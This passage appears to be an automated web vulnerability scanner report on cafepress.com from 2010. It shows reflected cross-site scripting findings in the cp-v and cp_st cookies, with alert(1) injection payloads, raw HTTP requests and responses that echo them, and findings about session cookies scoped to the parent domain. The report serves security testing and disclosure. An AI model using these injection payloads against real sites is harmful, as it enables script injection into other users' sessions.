__utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 63812 Date: Sun, 26 Dec 2010 13:47:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 63812 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'aa097</script><script>alert(1)</script>ac2f65e7c84 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.132. http://www.cafepress.com/sk/TheGamingApe [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/sk/TheGamingApe
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9ba9"-alert(1)-"3e702ef6992 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sk/TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAb9ba9"-alert(1)-"3e702ef6992 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 174586 Date: Sun, 26 Dec 2010 13:49:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 174586 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb9ba9"-alert(1)-"3e702ef6992 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.133. http://www.cafepress.com/sk/TheGamingApe [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/sk/TheGamingApe
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 622eb</script><script>alert(1)</script>7a1f01045b0 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sk/TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=622eb</script><script>alert(1)</script>7a1f01045b0 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 174630 Date: Sun, 26 Dec 2010 13:49:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 174630 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... _us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SKGallery' window.cafepress.tealeaf.searchTerm = '622eb</script><script>alert(1)</script>7a1f01045b0 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_0...[SNIP]...
2. Cookie scoped to parent domain
There are 70 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
2.1. http://www.cafepress.com/
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; 
cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 75158 Date: Sun, 26 Dec 2010 13:44:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75158 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]...
2.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; 
__utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 301 Moved Permanently Location: http://www.cafepress.com:80/+Eat+Sleep+Game+Light+T-Shirt,299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 Content-Length: 0 Date: Sun, 26 Dec 2010 13:44:48 GMT Connection: close Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private
2.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/
cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/
cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144?cmp=pfc--ca--us--152--273694144&utm_term=273694144&utm_campaign=Dark+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; cppid=5185601; xid=0; jid=0; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; cp-v=D0026F27AADDAF9A26C54608326FC1BA; utm_medium=productfeed; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; __utmb_sweepery=1.2.10.1293371031; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%2C%22referrer%22%3A%22None%22%2C%22viewCount%22%3A1%7D; cp_st=; cp_sc=100178; cppss=3x0; 
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmb-UA-11730150-1=1.2.10.1293371031; __utmc-UA-11730150-1=1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmb-UA-12011589-1=1.2.10.1293371032; __utmc-UA-12011589-1=1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmc=265344797; __utmb=265344797.12.10.1293371029; __cmbDomTm=0; __cmbTpvTm=1392
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 Cteonnt-Length: 118606 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 13:56:00 GMT Connection: close Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ 